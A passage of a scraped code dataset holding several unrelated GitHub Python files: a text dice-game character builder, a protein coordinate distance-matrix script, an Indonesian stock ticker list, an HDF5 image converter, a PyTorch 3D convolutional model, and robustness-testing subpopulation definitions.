level_increase\n\n #Dexterity increases\n def increaseDex(self, dex_increase):\n self.dex += dex_increase\n\n #Strength increases\n def increaseStrength(self, strength_increase):\n self.strength += strength_increase\n\n #Fucntions to return character details (will be made into a details() function later on\n def returnName(self):\n return self.name\n\n def returnSex(self):\n return self.sex\n\n def returnRace(self):\n return self.race\n\n def returnDex(self):\n return self.dex\n\n def returnStrength(self):\n return self.strength\n\n def returnLevel(self):\n return self.level\n\n#Dice class to construct the numerous dice needed to play\nclass dice():\n def __init__(self, sides):\n self.sides = sides\n\n #Allows the created dice to be rolled\n def roll(self):\n return random.randint(1, self.sides)\n\n#Makes a new character based on the information entered by the user\ndef makeNewCharacter():\n name = input(\"Please enter the name of your character: \")\n sex = input(\"Please enter the sex of your character: \")\n race = input(\"Please enter the race of your character: \")\n\n #This section ensures all numbers are entered as numbers\n while True:\n try:\n level = int(input(\"Please enter the level of your character (numerically): \"))\n except ValueError:\n print(\"Character level should be a number.\")\n else:\n break\n while True:\n try:\n dex = int(input(\"Please enter your character's dexterity (numerically): \"))\n except ValueError:\n print(\"Character dexterity should be a number.\")\n else:\n break\n while True:\n try:\n strength = int(input(\"Please enter your character's strength (numerically): \"))\n except ValueError:\n print(\"Character strength should be a number.\")\n else:\n break\n\n #Creates the new character and returns it\n new_character = character(name, sex, race, level, dex, strength)\n return new_character\n\n#Allows the user to roll for initiative\ndef initiative(player = character): #Currently not working as intended\n d20 = dice(20)\n initiative_roll = d20.roll()\n return initiative_roll\n\n#Creates a new battle\nclass battle():\n def __init__(self, monsters, players, encounter_level):\n self.monsters = monsters\n self.players = players\n self.encounter_level = encounter_level\n\ndef createNewBattle(self, monsters, players, encounter_level):\n battle(monsters, players, encounter_level)\n\n#Fights a battle that was selected\ndef fightBattle(battle):\n battle = \"battle\"\n\n#Makes interactive commands\ndef commands():\n\n #User needs to be able to create character, create encounter, roll initiative, and fight an\n #encounter, we need a while loop for entering the commands they want to do, an array of\n #the different commands available, and a way to exit the loop.\n commands_array = [\"Create New Character\", \"Create New Battle\", \"Roll Initiative\", \"Fight Battle\", \"Exit\"]\n print(\"\\nCommands:\")\n for i in range(len(commands_array)):\n print(commands_array[i])\n command = input(\"Please enter a command: \")\n print(\"Chosen command:\", command)\n while (command != \"Exit\"):\n if (command == \"Create New Character\"):\n makeNewCharacter()\n elif (command == \"Create New Battle\"):\n createNewBattle()\n elif (command == \"Roll Initiative\"):\n player_for_ini = input(\"Which player would you like to roll for?\")\n print(initiative(player_for_ini))\n command = \"Exit\"\n\n elif (command == \"Fight Battle\"):\n battle = input(\"Which battle would you like to fight?\")\n fightBattle(battle)\n elif (command == \"Exit\"):\n print(\"Thanks for playing\")\n else:\n print(\"Incorrect command was entered.\")\n command = input(\"Please look at the commands again and enter a correct command. \")\n\n\n\n#Main method, currently tests some of the code ive writrtgn\ndef main():\n player_one = makeNewCharacter()\n print(\"Name: \", player_one.returnName())\n print(\"Race: \", player_one.returnRace())\n print(\"Level: \", player_one.returnLevel())\n print(\"Dexterity: \", player_one.returnDex())\n print(\"Strength: \", player_one.returnStrength())\n print(\"Your initiative is: \", initiative(player_one))\n player_test = \"Player\"\n global player\n print(player)\n print(player_test)\n print(initiative())\n commands()\n\n#Runs the main method\nmain()","repo_name":"Mikel-millard/python","sub_path":"diceGame.py","file_name":"diceGame.py","file_ext":"py","file_size_in_byte":5248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30211259513","text":"'''\n# !/usr/bin/python3\n# -*- coding: utf-8 -*-\n@Time : 2021/11/22 20:30\n@Author : Qiufen.Chen\n@FileName: distance_TM.py\n@Software: PyCharm\n'''\n\nimport os\nimport numpy as np\nimport math\n\ndef make_dir(path):\n \"\"\"\n purpose: Created path folder\n :param path:\n :return:\n \"\"\"\n isExists = os.path.exists(path)\n if not isExists:\n os.makedirs(path)\n print(path + \" Created folder sucessful!\")\n return True\n else:\n print(\"This path is exist!\")\n return False\n\n\ndef get_matrix(input_dir, save_dir, threshold):\n file_num = 0\n count = 0\n for (root, dirs, files) in os.walk(input_dir):\n for file_name in files:\n file_num = file_num + 1\n with open(os.path.join(root, file_name), 'r') as f1:\n lines = f1.readlines()\n n = len(lines)\n\n initial_matrix = np.zeros((n, n))\n str1 = [0 for i in range(len(lines))] # 初始化0列表\n k = 0\n for line in lines:\n str1[k] = line[0:88] # 为列表赋值\n k = k + 1\n\n for i in range(0, len(lines)):\n # print(file_name, str1[i][84:88])\n if str1[i][84:88].strip() != 'T':\n continue\n\n x_1 = float(str1[i][30:38])\n y_1 = float(str1[i][38:46])\n z_1 = float(str1[i][46:56])\n\n for j in range(0, len(lines)):\n if str1[i][84:88].strip() != 'T':\n continue\n\n x_2 = float(str1[j][30:38])\n y_2 = float(str1[j][38:46])\n z_2 = float(str1[j][46:56])\n\n # 计算氨基酸之间的欧氏距离\n ans = math.sqrt(pow(x_1 - x_2, 2) + pow(y_1 - y_2, 2) + pow(z_1 - z_2, 2))\n # if ans <= threshold:\n # initial_matrix[i][j] = ans # 做成分类问题\n # 回归问题\n initial_matrix[i][j] = ans\n\n # print(initial_matrix.shape)\n print(initial_matrix.shape, initial_matrix.max(), initial_matrix.min())\n count = count + 1\n\n np.save(save_dir + '/' + str(file_name).split('.')[0], initial_matrix)\n\n print(\"Finished %d contact files.\" % count)\n\n\n# ----------------------------------------------------------------------------------------------\nif __name__ == \"__main__\":\n input_atom_dir = \"/lustre/home/qfchen/ContactMap/TMContact/atom_topo/\"\n output_matrix_dir = \"/lustre/home/qfchen/ContactMap/TMContact/new_lable/\"\n make_dir(input_atom_dir)\n\n get_matrix(input_atom_dir, output_matrix_dir, 8)\n\n\n\n\n\n\n\n","repo_name":"QiufenChen/TMP-SurResD","sub_path":"distance_TM.py","file_name":"distance_TM.py","file_ext":"py","file_size_in_byte":2810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74683453927","text":"list = ['AALI',\n'ABBA',\n'ABDA',\n'ABMM',\n'ACES',\n'ACST',\n'ADCP',\n'ADES',\n'ADHI',\n'ADMF',\n'ADMG',\n'ADMR',\n'ADRO',\n'AGAR',\n'AGII',\n'AGRO',\n'AGRS',\n'AHAP',\n'AIMS',\n'AISA',\n'AKKU',\n'AKPI',\n'AKRA',\n'AKSI',\n'ALDO',\n'ALKA',\n'ALMI',\n'ALTO',\n'AMAG',\n'AMAN',\n'AMAR',\n'AMFG',\n'AMIN',\n'AMMS',\n'AMOR',\n'AMRT',\n'ANDI',\n'ANJT',\n'ANTM',\n'APEX',\n'APIC',\n'APII',\n'APLI',\n'APLN',\n'ARCI',\n'ARGO',\n'ARII',\n'ARKA',\n'ARKO',\n'ARMY',\n'ARNA',\n'ARTA',\n'ARTI',\n'ARTO',\n'ASBI',\n'ASDM',\n'ASGR',\n'ASHA',\n'ASII',\n'ASJT',\n'ASLC',\n'ASMI',\n'ASPI',\n'ASRI',\n'ASRM',\n'ASSA',\n'ATAP',\n'ATIC',\n'AUTO',\n'AVIA',\n'AXIO',\n'AYLS',\n'BABP',\n'BACA',\n'BAEK',\n'BAJA',\n'BALI',\n'BANK',\n'BAPA',\n'BAPI',\n'BATA',\n'BAUT',\n'BAYU',\n'BBCA',\n'BBHI',\n'BBKP',\n'BBLD',\n'BBMD',\n'BBNI',\n'BBRI',\n'BBRM',\n'BBSI',\n'BBSS',\n'BBTN',\n'BBYB',\n'BCAP',\n'BCIC',\n'BCIP',\n'BDMN',\n'BEBS',\n'BEEF',\n'BEKS',\n'BELI',\n'BELL',\n'BESS',\n'BEST',\n'BFIN',\n'BGTG',\n'BHAT',\n'BHIT',\n'BIKA',\n'BIKE',\n'BIMA',\n'BINA',\n'BINO',\n'BIPI',\n'BIPP',\n'BIRD',\n'BISI',\n'BJBR',\n'BJTM',\n'BKDP',\n'BKSL',\n'BKSW',\n'BLTA',\n'BLTZ',\n'BLUE',\n'BMAS',\n'BMHS',\n'BMRI',\n'BMSR',\n'BMTR',\n'BNBA',\n'BNBR',\n'BNGA',\n'BNII',\n'BNLI',\n'BOBA',\n'BOGA',\n'BOLA',\n'BOLT',\n'BOSS',\n'BPFI',\n'BPII',\n'BPTR',\n'BRAM',\n'BRIS',\n'BRMS',\n'BRNA',\n'BRPT',\n'BSBK',\n'BSDE',\n'BSIM',\n'BSML',\n'BSSR',\n'BSWD',\n'BTEK',\n'BTEL',\n'BTON',\n'BTPN',\n'BTPS',\n'BUAH',\n'BUDI',\n'BUKA',\n'BUKK',\n'BULL',\n'BUMI',\n'BUVA',\n'BVIC',\n'BWPT',\n'BYAN',\n'CAKK',\n'CAMP',\n'CANI',\n'CARE',\n'CARS',\n'CASA',\n'CASH',\n'CASS',\n'CBMF',\n'CBUT',\n'CCSI',\n'CEKA',\n'CENT',\n'CFIN',\n'CHEM',\n'CINT',\n'CITA',\n'CITY',\n'CLAY',\n'CLEO',\n'CLPI',\n'CMNP',\n'CMNT',\n'CMPP',\n'CMRY',\n'CNKO',\n'CNTB',\n'CNTX',\n'COAL',\n'COCO',\n'COWL',\n'CPIN',\n'CPRI',\n'CPRO',\n'CRAB',\n'CSAP',\n'CSIS',\n'CSMI',\n'CSRA',\n'CTBN',\n'CTRA',\n'CTTH',\n'DADA',\n'DART',\n'DAYA',\n'DCII',\n'DEAL',\n'DEFI',\n'DEPO',\n'DEWA',\n'DEWI',\n'DFAM',\n'DGIK',\n'DGNS',\n'DIGI',\n'DILD',\n'DIVA',\n'DKFT',\n'DLTA',\n'DMAS',\n'DMMX',\n'DMND',\n'DNAR',\n'DNET',\n'DOID',\n'DPNS',\n'DPUM',\n'DRMA',\n'DSFI',\n'DSNG',\n'DSSA',\n'DUCK',\n'DUTI',\n'DVLA',\n'DWGL',\n'DYAN',\n'EAST',\n'ECII',\n'EDGE',\n'EKAD',\n'ELPI',\n'ELSA',\n'ELTY',\n'EMDE',\n'EMTK',\n'ENAK',\n'ENRG',\n'ENVY',\n'ENZO',\n'EPAC',\n'EPMT',\n'ERAA',\n'ERTX',\n'ESIP',\n'ESSA',\n'ESTA',\n'ESTI',\n'ETWA',\n'EURO',\n'EXCL',\n'FAPA',\n'FAST',\n'FASW',\n'FILM',\n'FIMP',\n'FIRE',\n'FISH',\n'FITT',\n'FLMC',\n'FMII',\n'FOOD',\n'FORU',\n'FORZ',\n'FPNI',\n'FREN',\n'FUJI',\n'GAMA',\n'GDST',\n'GDYR',\n'GEMA',\n'GEMS',\n'GGRM',\n'GGRP',\n'GHON',\n'GIAA',\n'GJTL',\n'GLOB',\n'GLVA',\n'GMFI',\n'GMTD',\n'GOLD',\n'GOLL',\n'GOOD',\n'GOTO',\n'GPRA',\n'GPSO',\n'GSMF',\n'GTBO',\n'GTSI',\n'GULA',\n'GWSA',\n'GZCO',\n'HADE',\n'HAIS',\n'HATM',\n'HDFA',\n'HDIT',\n'HDTX',\n'HEAL',\n'HELI',\n'HERO',\n'HEXA',\n'HITS',\n'HKMU',\n'HMSP',\n'HOKI',\n'HOME',\n'HOMI',\n'HOPE',\n'HOTL',\n'HRME',\n'HRTA',\n'HRUM',\n'IATA',\n'IBFN',\n'IBOS',\n'IBST',\n'ICBP',\n'ICON',\n'IDEA',\n'IDPR',\n'IFII',\n'IFSH',\n'IGAR',\n'IIKP',\n'IKAI',\n'IKAN',\n'IKBI',\n'IMAS',\n'IMJS',\n'IMPC',\n'INAF',\n'INAI',\n'INCI',\n'INCO',\n'INDF',\n'INDO',\n'INDR',\n'INDS',\n'INDX',\n'INDY',\n'INKP',\n'INOV',\n'INPC',\n'INPP',\n'INPS',\n'INRU',\n'INTA',\n'INTD',\n'INTP',\n'IPAC',\n'IPCC',\n'IPCM',\n'IPOL',\n'IPPE',\n'IPTV',\n'IRRA',\n'ISAT',\n'ISSP',\n'ITIC',\n'ITMA',\n'ITMG',\n'JARR',\n'JAST',\n'JAWA',\n'JAYA',\n'JECC',\n'JGLE',\n'JIHD',\n'JKON',\n'JKSW',\n'JMAS',\n'JPFA',\n'JRPT',\n'JSKY',\n'JSMR',\n'JSPT',\n'JTPE',\n'KAEF',\n'KARW',\n'KAYU',\n'KBAG',\n'KBLI',\n'KBLM',\n'KBLV',\n'KBRI',\n'KDSI',\n'KDTN',\n'KEEN',\n'KEJU',\n'KETR',\n'KIAS',\n'KICI',\n'KIJA',\n'KINO',\n'KIOS',\n'KJEN',\n'KKES',\n'KKGI',\n'KLBF',\n'KLIN',\n'KMDS',\n'KMTR',\n'KOBX',\n'KOIN',\n'KONI',\n'KOPI',\n'KOTA',\n'KPAL',\n'KPAS',\n'KPIG',\n'KRAH',\n'KRAS',\n'KREN',\n'KRYA',\n'KUAS',\n'LABA',\n'LAND',\n'LAPD',\n'LCGP',\n'LCKM',\n'LEAD',\n'LFLO',\n'LIFE',\n'LINK',\n'LION',\n'LMAS',\n'LMPI',\n'LMSH',\n'LPCK',\n'LPGI',\n'LPIN',\n'LPKR',\n'LPLI',\n'LPPF',\n'LPPS',\n'LRNA',\n'LSIP',\n'LTLS',\n'LUCK',\n'LUCY',\n'MABA',\n'MAGP',\n'MAIN',\n'MAMI',\n'MAPA',\n'MAPB',\n'MAPI',\n'MARI',\n'MARK',\n'MASA',\n'MASB',\n'MAYA',\n'MBAP',\n'MBSS',\n'MBTO',\n'MCAS',\n'MCOL',\n'MCOR',\n'MDIA',\n'MDKA',\n'MDKI',\n'MDLN',\n'MDRN',\n'MEDC',\n'MEDS',\n'MEGA',\n'MERK',\n'META',\n'MFIN',\n'MFMI',\n'MGLV',\n'MGNA',\n'MGRO',\n'MICE',\n'MIDI',\n'MIKA',\n'MINA',\n'MIRA',\n'MITI',\n'MKNT',\n'MKPI',\n'MKTR',\n'MLBI',\n'MLIA',\n'MLPL',\n'MLPT',\n'MMIX',\n'MMLP',\n'MNCN',\n'MOLI',\n'MORA',\n'MPMX',\n'MPOW',\n'MPPA',\n'MPRO',\n'MRAT',\n'MREI',\n'MSIN',\n'MSKY',\n'MTDL',\n'MTEL',\n'MTFN',\n'MTLA',\n'MTMH',\n'MTPS',\n'MTRA',\n'MTSM',\n'MTWI',\n'MYOH',\n'MYOR',\n'MYRX',\n'MYTX',\n'NANO',\n'NASA',\n'NASI',\n'NATO',\n'NELY',\n'NETV',\n'NFCX',\n'NICK',\n'NICL',\n'NIKL',\n'NINE',\n'NIPS',\n'NIRO',\n'NISP',\n'NOBU',\n'NPGF',\n'NRCA',\n'NTBK',\n'NUSA',\n'NZIA',\n'OASA',\n'OBMD',\n'OCAP',\n'OILS',\n'OKAS',\n'OLIV',\n'OMED',\n'OMRE',\n'OPMS',\n'PADA',\n'PADI',\n'PALM',\n'PAMG',\n'PANI',\n'PANR',\n'PANS',\n'PBID',\n'PBRX',\n'PBSA',\n'PCAR',\n'PDES',\n'PDPP',\n'PEGE',\n'PEHA',\n'PGAS',\n'PGJO',\n'PGLI',\n'PGUN',\n'PICO',\n'PJAA',\n'PKPK',\n'PLAN',\n'PLAS',\n'PLIN',\n'PMJS',\n'PMMP',\n'PNBN',\n'PNBS',\n'PNGO',\n'PNIN',\n'PNLF',\n'PNSE',\n'POLA',\n'POLI',\n'POLL',\n'POLU',\n'POLY',\n'POOL',\n'PORT',\n'POSA',\n'POWR',\n'PPGL',\n'PPRE',\n'PPRO',\n'PRAS',\n'PRAY',\n'PRDA',\n'PRIM',\n'PSAB',\n'PSDN',\n'PSGO',\n'PSKT',\n'PSSI',\n'PTBA',\n'PTDU',\n'PTIS',\n'PTPP',\n'PTPW',\n'PTRO',\n'PTSN',\n'PTSP',\n'PUDP',\n'PURA',\n'PURE',\n'PURI',\n'PWON',\n'PYFA',\n'PZZA',\n'RAFI',\n'RAJA',\n'RALS',\n'RANC',\n'RBMS',\n'RCCC',\n'RDTX',\n'REAL',\n'RELI',\n'RICY',\n'RIGS',\n'RIMO',\n'RISE',\n'RMBA',\n'RMKE',\n'ROCK',\n'RODA',\n'RONY',\n'ROTI',\n'RSGK',\n'RUIS',\n'RUNS',\n'SAFE',\n'SAME',\n'SAMF',\n'SAPX',\n'SATU',\n'SBAT',\n'SBMA',\n'SCCO',\n'SCMA',\n'SCNP',\n'SCPI',\n'SDMU',\n'SDPC',\n'SDRA',\n'SEMA',\n'SFAN',\n'SGER',\n'SGRO',\n'SHID',\n'SHIP',\n'SICO',\n'SIDO',\n'SILO',\n'SIMA',\n'SIMP',\n'SINI',\n'SIPD',\n'SKBM',\n'SKLT',\n'SKRN',\n'SKYB',\n'SLIS',\n'SMAR',\n'SMBR',\n'SMCB',\n'SMDM',\n'SMDR',\n'SMGR',\n'SMKL',\n'SMKM',\n'SMMA',\n'SMMT',\n'SMRA',\n'SMRU',\n'SMSM',\n'SNLK',\n'SOCI',\n'SOFA',\n'SOHO',\n'SONA',\n'SOSS',\n'SOTS',\n'SPMA',\n'SPTO',\n'SQBI',\n'SQMI',\n'SRAJ',\n'SRIL',\n'SRSN',\n'SRTG',\n'SSIA',\n'SSMS',\n'SSTM',\n'STAA',\n'STAR',\n'STTP',\n'SUGI',\n'SULI',\n'SUPR',\n'SURE',\n'SWAT',\n'SWID',\n'TALF',\n'TAMA',\n'TAMU',\n'TAPG',\n'TARA',\n'TAXI',\n'TAYS',\n'TBIG',\n'TBLA',\n'TBMS',\n'TCID',\n'TCPI',\n'TDPM',\n'TEBE',\n'TECH',\n'TELE',\n'TFAS',\n'TFCO',\n'TGKA',\n'TGRA',\n'TIFA',\n'TINS',\n'TIRA',\n'TIRT',\n'TKIM',\n'TLDN',\n'TLKM',\n'TMAS',\n'TMPO',\n'TNCA',\n'TOBA',\n'TOOL',\n'TOPS',\n'TOTL',\n'TOTO',\n'TOWR',\n'TOYS',\n'TPIA',\n'TPMA',\n'TRAM',\n'TRGU',\n'TRIL',\n'TRIM',\n'TRIN',\n'TRIO',\n'TRIS',\n'TRJA',\n'TRST',\n'TRUE',\n'TRUK',\n'TRUS',\n'TSPC',\n'TUGU',\n'TURI',\n'UANG',\n'UCID',\n'UFOE',\n'ULTJ',\n'UNIC',\n'UNIQ',\n'UNIT',\n'UNSP',\n'UNTR',\n'UNVR',\n'URBN',\n'UVCR',\n'VICI',\n'VICO',\n'VINS',\n'VIVA',\n'VOKS',\n'VRNA',\n'WAPO',\n'WEGE',\n'WEHA',\n'WGSH',\n'WICO',\n'WIFI',\n'WIIM',\n'WIKA',\n'WINR',\n'WINS',\n'WIRG',\n'WMPP',\n'WMUU',\n'WOMF',\n'WOOD',\n'WOWS',\n'WSBP',\n'WSKT',\n'WTON',\n'XCID',\n'YELO',\n'YPAS',\n'YULE',\n'ZATA',\n'ZBRA',\n'ZINC',\n'ZONE',\n'ZYRX']","repo_name":"gammarinaldi/wina_idx","sub_path":"market_data_updater/api/stock_all.py","file_name":"stock_all.py","file_ext":"py","file_size_in_byte":6615,"program_lang":"python","lang":"hi","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"42880341755","text":"import os\nimport tqdm\nimport h5py\nimport numpy as np\nfrom PIL import Image\n\n\npath = \"./inputs/val/\"\nsave_path = \"./inputs/rgb/\"\nif not os.path.exists(save_path): os.makedirs(save_path)\n\nfor i in tqdm.tqdm(os.listdir(path)):\n path1 = os.path.join(path, i)\n for j in os.listdir(path1):\n h5 = h5py.File(os.path.join(path1, j), 'r')\n depth = h5['depth'][:]\n rgb = h5['rgb'][:]\n depth = np.array(depth)\n rgb = np.transpose(np.array(rgb), (1, 2, 0))\n depth = Image.fromarray(depth.astype('uint8'))\n rgb = Image.fromarray(np.uint8(rgb))\n rgb = rgb.resize((640*2, 480*2))\n rgb.save(os.path.join(save_path, os.path.splitext(j)[0]+'.png'))\n\n# classes = [d for d in os.listdir(path) if os.path.isdir(os.path.join(path, d))]\n# print(classes)\n# l = [j for i in os.listdir(path) for j in os.listdir(os.path.join(path, i))]\n# print(l)","repo_name":"yeluoo/3d-photo-inpainting","sub_path":"sparse-to-dense/h5img.py","file_name":"h5img.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70900257449","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport math\n\ndef loss_fn(pred, target, projectors, edges=None):\n loss = 0.\n N_cams = len(projectors)\n if edges is not None:\n for edge_info in edges:\n weight = edge_info[3]\n length = edge_info[2]\n dist = (weight * torch.abs(length - torch.square(pred[:,edge_info[0]:edge_info[0]+1,:].squeeze() - pred[:,edge_info[1]:edge_info[1]+1,:].squeeze()))).sum()\n loss += dist\n for i in range(N_cams):\n pred = pred.reshape(-1, 3)\n projector = projectors[i]\n projected = projector(pred).view(-1)\n cur_target = target[:,i*2:(i*2)+2,:].reshape(-1)\n visible_projected = projected[cur_target != -1.]\n visible_cur_target = cur_target[cur_target != -1.]\n dist = torch.square(visible_projected - visible_cur_target).sum()\n loss += dist\n return loss\n \n\nclass Model(nn.Module):\n def __init__(self, \n input_depth, \n input_height, \n input_width, \n padding=1, \n stride=1, \n poolstride1=3, \n poolstride2=2, \n dilation=1, \n kernel_size1=4, \n kernel_size2=2, \n kernel_pool1=3, \n kernel_pool2=2):\n super().__init__()\n convs = []\n final_depth = input_depth\n final_height = input_height\n final_width = input_width\n for i in range(4,8):\n conv1 = nn.Conv3d(i,i,kernel_size1,stride=stride,padding=padding)\n final_depth = math.floor(((final_depth + (2*padding) - (dilation * (kernel_size1 - 1)) - 1)/stride)+1)\n final_height = math.floor(((final_height + (2*padding) - (dilation * (kernel_size1 - 1)) - 1)/stride)+1)\n final_width = math.floor(((final_width + (2*padding) - (dilation * (kernel_size1 - 1)) - 1)/stride)+1)\n pool1 = nn.MaxPool3d(kernel_pool1,stride=poolstride1,padding=padding)\n final_depth = math.floor(((final_depth + (2*padding) - (dilation * (kernel_pool1 - 1)) - 1)/poolstride1)+1)\n final_height = math.floor(((final_height + (2*padding) - (dilation * (kernel_pool1 - 1)) - 1)/poolstride1)+1)\n final_width = math.floor(((final_width + (2*padding) - (dilation * (kernel_pool1 - 1)) - 1)/poolstride1)+1)\n conv2 = nn.Conv3d(i,i+1,kernel_size2,stride=stride,padding=padding)\n final_depth = math.floor(((final_depth + (2*padding) - (dilation * (kernel_size2 - 1)) - 1)/stride)+1)\n final_height = math.floor(((final_height + (2*padding) - (dilation * (kernel_size2 - 1)) - 1)/stride)+1)\n final_width = math.floor(((final_width + (2*padding) - (dilation * (kernel_size2 - 1)) - 1)/stride)+1)\n pool2 = nn.MaxPool3d(kernel_pool2,stride=poolstride2,padding=padding)\n final_depth = math.floor(((final_depth + (2*padding) - (dilation * (kernel_pool2 - 1)) - 1)/poolstride2)+1)\n final_height = math.floor(((final_height + (2*padding) - (dilation * (kernel_pool2 - 1)) - 1)/poolstride2)+1)\n final_width = math.floor(((final_width + (2*padding) - (dilation * (kernel_pool2 - 1)) - 1)/poolstride2)+1)\n convs.append(conv1)\n convs.append(pool1)\n convs.append(conv2)\n convs.append(pool2)\n self.conv_net = nn.Sequential(*convs)\n after_conv_num = final_depth*final_height*final_width*8\n self.after_conv_num = after_conv_num\n self.l1 = nn.Linear(after_conv_num, after_conv_num //2)\n self.l2 = nn.Linear(after_conv_num // 2, 8 * 3)\n \n def forward(self, x):\n conv_out = self.conv_net(x).view(-1, self.after_conv_num)\n lin_out = self.l2(F.relu(self.l1(conv_out)))\n out = lin_out.view(-1,8,3)\n return out","repo_name":"patrickdwyer33/Tracking_3d","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42742960828","text":"from lbt.tools.robustnessgym.base_subpopulation import BaseSubpopulation\nfrom lbt.tools.robustnessgym import register_lbtsubpop\nfrom robustnessgym import (\n LengthSubpopulation,\n HasPhrase,\n HasAnyPhrase,\n)\n\nimport requests\n\nfrom robustnessgym import Spacy\nfrom robustnessgym import ScoreSubpopulation, Identifier\nimport pandas as pd\nimport itertools\nfrom functools import partial\n\n# TODO: ASN --> Identity Phrases, Emoji,\n\n\n@register_lbtsubpop(\"entities\")\nclass EntitySubpopulation(BaseSubpopulation):\n def __init__(self):\n self.name = \"entities\"\n self.entity_types = [\n \"PERSON\",\n \"NORP\",\n \"FAC\",\n \"ORG\",\n \"GPE\",\n \"LOC\",\n \"PRODUCT\",\n \"EVENT\",\n \"WORK_OF_ART\",\n \"LAW\",\n \"LANGUAGE\",\n \"DATE\",\n \"TIME\",\n \"PERCENT\",\n \"MONEY\",\n \"QUANTITY\",\n \"ORDINAL\",\n \"CARDINAL\",\n ]\n\n def score_fn(self, batch, columns, entity, spacy):\n try:\n entites_list = Spacy.retrieve(\n batch, columns, proc_fns=Spacy.entities\n )\n except ValueError:\n spacy_op = spacy(batch, columns)\n entites_list = Spacy.retrieve(\n spacy_op, columns, proc_fns=Spacy.entities\n )\n overall_batch_score = []\n for entities in entites_list:\n ents = set(entity[\"label\"] for entity in entities)\n if entity in ents:\n overall_batch_score.append(1)\n else:\n overall_batch_score.append(0)\n return overall_batch_score\n\n def get_subpops(self, spacy):\n EntitiesSubpopulation = lambda entity, score_fn: ScoreSubpopulation(\n identifiers=[Identifier(f\"{entity}\")],\n intervals=[(1, 1)],\n score_fn=score_fn,\n )\n\n entity_subpops = []\n for entity in self.entity_types:\n entity_subpops.append(\n EntitiesSubpopulation(\n entity, partial(self.score_fn, entity=entity, spacy=spacy)\n )\n )\n return entity_subpops\n\n\n@register_lbtsubpop(\"pos\")\nclass POSSubpopulation(BaseSubpopulation):\n def __init__(self):\n self.name = \"POS\"\n self.universalpos = [\n \"ADJ\",\n \"ADP\",\n \"ADV\",\n \"AUX\",\n \"CONJ\",\n \"CCONJ\",\n \"DET\",\n \"INTJ\",\n \"NOUN\",\n \"NUM\",\n \"PART\",\n \"PRON\",\n \"PROPN\",\n \"PUNCT\",\n \"SCONJ\",\n \"SYM\",\n \"VERB\",\n \"X\",\n \"EOL\",\n \"SPACE\",\n ]\n\n def score_fn(self, batch, columns, pos, spacy):\n try:\n spacy_annotations = Spacy.retrieve(batch, columns)\n except ValueError:\n spacy_op = spacy(batch, columns)\n spacy_annotations = Spacy.retrieve(spacy_op, columns)\n\n overall_batch_score = []\n for sample_annotation in spacy_annotations:\n pos_in_sample = set(\n token[\"pos\"] for token in sample_annotation[\"tokens\"]\n )\n if pos in pos_in_sample:\n overall_batch_score.append(1)\n else:\n overall_batch_score.append(0)\n\n return overall_batch_score\n\n def get_subpops(self, spacy):\n POSSubpopulation = lambda pos, score_fn: ScoreSubpopulation(\n identifiers=[Identifier(f\"{pos}\")],\n intervals=[(1, 1)],\n score_fn=score_fn,\n )\n\n pos_subpops = []\n for pos in self.universalpos:\n pos_subpops.append(\n POSSubpopulation(\n pos, partial(self.score_fn, pos=pos, spacy=spacy)\n )\n )\n return pos_subpops\n\n\n@register_lbtsubpop(\"gender_bias\")\nclass GenderBiasSubpopulation(BaseSubpopulation):\n def __init__(self):\n \"\"\"\n Measures performance on gender co-occurence pairs\n \"\"\"\n self.name = \"gender_bias\"\n self.female_identity = [\n \"she\",\n \"her\",\n \"herself\",\n \"girl\",\n \"woman\",\n \"women\",\n \"females\",\n \"female\",\n \"girls\",\n \"feminine\",\n ]\n self.male_identity = [\n \"he\",\n \"him\",\n \"himself\",\n \"boy\",\n \"man\",\n \"men\",\n \"males\",\n \"male\",\n \"boys\",\n \"masculine\",\n ]\n self.non_binary_identity = [\n \"they\",\n \"them\",\n \"theirs\",\n \"their\",\n \"themself\",\n ]\n self.gender_categories = {\n \"female\": self.female_identity,\n \"male\": self.male_identity,\n \"non_binary\": self.non_binary_identity,\n }\n\n self.career_words = [\n \"executive\",\n \"professional\",\n \"corporation\",\n \"salary\",\n \"office\",\n \"business\",\n \"career\",\n ]\n self.family_words = [\n \"home\",\n \"parents\",\n \"children\",\n \"family\",\n \"cousin\",\n \"marriage\",\n \"wedding\",\n \"relatives\",\n ]\n self.math_words = [\n \"math\",\n \"algebra\",\n \"geometry\",\n \"calculus\",\n \"equation\",\n \"compute\",\n \"numbers\",\n \"addition\",\n ]\n self.arts_words = [\n \"poetry\",\n \"art\",\n \"dance\",\n \"literature\",\n \"novel\",\n \"symphony\",\n \"drama\",\n ]\n self.science_words = [\n \"science\",\n \"technology\",\n \"physics\",\n \"chemistry\",\n \"Einstein\",\n \"NASA\",\n \"experiment\",\n \"astronomy\",\n ]\n\n self.domains = {\n \"career\": self.career_words,\n \"family\": self.family_words,\n \"math\": self.math_words,\n \"arts\": self.arts_words,\n \"science\": self.science_words,\n }\n\n def score_fn(self, batch, columns, pair):\n overall_batch_score = []\n for text in batch[columns[0]]:\n if pair[0] in text and pair[1] in text:\n overall_batch_score.append(1)\n else:\n overall_batch_score.append(0)\n return overall_batch_score\n\n def build_cooccurence_pairs(self, gender_categories: dict, domains: dict):\n bias_pairs = []\n for _, gender_list in gender_categories.items():\n for _, phrase_list in domains.items():\n bias_pairs.extend(\n [\n pair\n for pair in itertools.product(gender_list, phrase_list)\n ]\n )\n return bias_pairs\n\n def get_subpops(self, spacy):\n bias_pairs = self.build_cooccurence_pairs(\n self.gender_categories, self.domains\n )\n BiasCooccurenceSubpopulation = (\n lambda pair, score_fn: ScoreSubpopulation(\n identifiers=[Identifier(f\"{pair[0]}_{pair[1]}\")],\n intervals=[(1, 1)],\n score_fn=self.score_fn,\n )\n )\n\n bias_subpops = []\n for pair in bias_pairs:\n bias_subpops.append(\n BiasCooccurenceSubpopulation(\n pair, partial(self.score_fn, pair=pair)\n )\n )\n return bias_subpops\n\n\n@register_lbtsubpop(\"positive_sentiment\")\nclass 